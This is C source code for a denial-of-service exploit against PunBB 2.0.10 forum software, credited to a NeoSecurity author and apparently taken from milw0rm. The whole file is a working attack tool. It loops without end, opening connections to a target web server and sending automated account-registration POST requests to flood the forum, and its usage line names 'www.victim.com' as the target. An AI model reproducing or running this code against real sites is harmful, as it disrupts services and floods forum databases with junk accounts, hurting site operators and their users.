/* Name: NST-Exploit Punbb 2.0.10 Denial Of Service Copyright: NeoSecurity Author: K4P0 [./]NST-XplPunbb www.victim.com 2.0.0.6 /punbb/ ################################################# PunBB 2.0.10 Denial of Service exploit by K4P0 Use only at your own reputation risk! ;) www.NeoSecurityTeam.net ################################################# [1] - Trying if connection is possible... [2] - Connected! [3] - Flooding localhost... Use it at your own risk!. */ #define WINDOWS //#define LINUX #include #include #include #ifdef WINDOWS #include #include // Link to (lib)ws2_32.a #else #include #include #include #endif #define NST_ALIVE 1 int Connect(char*); void SendPack(int, int, char*, char*); void _perror(char*); void HowTo(char*); int main(int argc, char* argv[]) { int vict_sock, dos = 0; puts("#################################################"); puts(" PunBB 2.0.10 Denial of Service exploit by K4P0 "); puts(" Use only at your own reputation risk! ;) \n"); puts(" www.NeoSecurityTeam.net "); if(argc < 4) HowTo(argv[0]); puts("#################################################\n"); printf("[1] - Trying if connection is possible...\n", argv[1]); fflush(stdout); vict_sock = Connect(argv[2]); printf("[2] - Connected!\n"); printf("[3] - Flooding %s", argv[1]); #ifdef WINDOWS closesocket(vict_sock); #else close(vict_sock); #endif while(NST_ALIVE) { if(!(dos % 10)) fprintf(stderr, "."); vict_sock = Connect(argv[2]); SendPack(vict_sock, dos, argv[3], argv[1]); dos++; #ifdef WINDOWS closesocket(vict_sock); WSACleanup(); #else close(vict_sock); #endif } return 0; } // I'm to lazy to use gethostby(addr|name) :) int Connect(char* IP) { struct sockaddr_in *_addr; int vict_sck; #ifdef WINDOWS WSADATA wsaData; if(WSAStartup(MAKEWORD(1, 1), &wsaData) < 0) { //WSAGetLastError()? Nah... fprintf(stderr, "[*] WSAStartup() failed"); exit(-1); } #endif if(!(_addr=(struct sockaddr_in *)malloc(sizeof(struct sockaddr_in)))) { fprintf(stderr, "[*] Unable to reserve memory"); exit(-1); } memset(_addr, 0x0, sizeof(struct sockaddr_in)); _addr->sin_family = AF_INET; _addr->sin_port = htons(80); _addr->sin_addr.s_addr = inet_addr(IP); #ifdef WINDOWS if((vict_sck = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)) < 0) { fprintf(stderr, "WSASocket() failed"); exit(-1); } else if((vict_sck = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) _perror("socket() "); #endif if(connect(vict_sck, (struct sockaddr *)_addr, sizeof(struct sockaddr)) < 0) _perror("connect() "); free(_addr); return vict_sck; } void SendPack(int v_sck, int var, char* path, char* DNS) { char *HTTP_PACK, *HTTP_MPCK, *HTTP_POST; if(!(HTTP_PACK = (char *)malloc(2048)) || !(HTTP_MPCK = (char *)malloc(1024)) || !(HTTP_POST = (char *)malloc(512))) { fprintf(stderr, "Error trying to reserver memory"); exit(-1); } sprintf(HTTP_PACK, "POST %sregister.php?action=register HTTP/1.1\n" "Host: %s\n" "User-Agent: Mozilla/5.0 Gecko/20050511 Firefox/1.0.4\n" "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n" "Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3\n" "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n" "Keep-Alive: 300\n" "Proxy-Connection: keep-alive\n" "Referer: http://%s%sregister.php\n" "Content-Type: application/x-www-form-urlencoded\n", path, DNS, DNS, path); sprintf(HTTP_POST, "form_sent=1&req_username=%d__NsT&req_password1=flood&req_password2=flood&" "req_email1=%d_peace@NsT.net&timezone=-10&email_setting=1", var, var); sprintf(HTTP_MPCK, "Content-Length: %d\n\n", strlen(HTTP_POST)); strcat(HTTP_PACK, HTTP_MPCK); strcat(HTTP_PACK, HTTP_POST); send(v_sck, HTTP_PACK, strlen(HTTP_PACK), 0); free(HTTP_PACK); free(HTTP_MPCK); free(HTTP_POST); return; } void _perror(char* msg) { perror(msg); fflush(stdout); exit(-1); } void HowTo(char* program) { fprintf(stderr, "%s \n", program); fprintf(stderr, "f.e: ./NsT-XplPunbb www.victim.com 2.0.0.6 /punbb/\n"); fprintf(stderr, "#################################################"); exit(0); } // milw0rm.com [2006-02-20]